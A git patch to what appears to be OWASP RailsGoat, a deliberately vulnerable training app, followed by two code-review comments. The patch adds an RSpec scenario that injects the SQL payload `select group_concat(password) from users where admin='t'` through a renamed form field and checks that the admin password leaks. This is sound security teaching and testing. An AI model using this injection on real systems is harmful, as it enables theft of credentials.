From 9b1d402937fc767a7eae86af512356cff7a886e2 Mon Sep 17 00:00:00 2001 From: Joseph Mastey Date: Mon, 18 Sep 2017 18:44:45 -0500 Subject: [PATCH] feat(vulnerabilities): adds description of vulnerability for sql interpolation also fixes several small errors on that page, otherwise JS raises errors. fixes #181 --- app/views/layouts/admin/_analytics.html.erb | 20 ++++++++++--------- spec/vulnerabilities/sql_injection_spec.rb | 22 ++++++++++++++++++++- 2 files changed, 32 insertions(+), 10 deletions(-) diff --git a/app/views/layouts/admin/_analytics.html.erb b/app/views/layouts/admin/_analytics.html.erb index be676a0..ba0c436 100644 --- a/app/views/layouts/admin/_analytics.html.erb +++ b/app/views/layouts/admin/_analytics.html.erb @@ -1,18 +1,18 @@ -
- Search by IP:
- IP Address
- Referrer
- User Agent + + Search by IP:
+ IP Address
+ Referrer
+ User Agent
- +
" id="data-table"> <% - count = (params[:field] ? params[:field].count : 3) + count = (params[:field] ? (params[:field].count+1) : 6) count.times do %> - + <% end %> @@ -33,6 +33,8 @@ +<%= javascript_include_tag "jquery.dataTables.js"%> + \ No newline at end of file + diff --git a/spec/vulnerabilities/sql_injection_spec.rb b/spec/vulnerabilities/sql_injection_spec.rb index a963a56..96ffe83 100644 --- a/spec/vulnerabilities/sql_injection_spec.rb +++ b/spec/vulnerabilities/sql_injection_spec.rb @@ -1,7 +1,7 @@ require 'spec_helper' feature 'sql injection' do - before do + before(:each) do UserFixture.reset_all_users @normal_user = UserFixture.normal_user @admin_user = User.where("admin='t'").first @@ -28,4 +28,24 @@ feature 'sql injection' do expect(@admin_user.email).to eq('joe.admin@schmoe.com') expect(@admin_user.admin).to eq(true) end + + scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/A1-SQL-Injection-Interpolation", js: true do + login(@normal_user) + Analytics.create!(ip_address: "::1") + + visit "/admin/1/analytics" + + within('#analytics_search') do + fill_in 'ip', :with => '::1' + check "field_user_agent" + payload = "(select group_concat(password) from users where admin='t')" + + page.execute_script "$('#field_user_agent').attr('name', \"field[#{payload}]\");" + page.execute_script "$('#analytics_search').submit();" + end + + pending if verifying_fixed? + expect(page).to have_css(".dataTable.custom") + expect(page.source).to include(@admin_user.password) + end end
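Review bot: `count = (params[:field] ? (params[:field].count+1) : 6)` derives the number of header cells from a request parameter of unchecked type: `field` sent as a scalar (`?field=ip_address`) arrives as a String, whose `count` with no argument raises ArgumentError and errors the whole page, whereas the Array the form sends and the Hash the new spec sends both work. A duck-typed guard keeps both working paths and makes the scalar case fall back instead of raising, e.g. `fields = params[:field]` / `count = fields.respond_to?(:each) ? fields.count + 1 : 6`. The constants `+1` and `6` presumably mirror the table's fixed columns, but the surrounding `<th>` markup is not visible in this excerpt, so a comment such as `<%# one header cell per selected field plus the fixed columns; 6 when no filter is given %>` above the assignment would save the next reader from re-deriving them.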
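Review bot: The new scenario depends on two preconditions the assertions never state: a non-admin session (`login(@normal_user)`) reaching `/admin/1/analytics`, and a database that understands `group_concat` (SQLite and MySQL do; PostgreSQL would need `string_agg`). If either changes independently of the interpolation fix, the run fails on `have_css(".dataTable.custom")` rather than on the injection, which makes the failure misleading; a comment above `login(@normal_user)` such as `# relies on /admin being reachable by a non-admin and on a group_concat-capable DB` would document that. The `pending if verifying_fixed?` guard also relies on RSpec 3 semantics where a pending example that then passes is reported as a failure, so the "fixed" verification is the page source *not* containing `@admin_user.password`; worth stating in the same comment since nothing in the example makes that intent explicit.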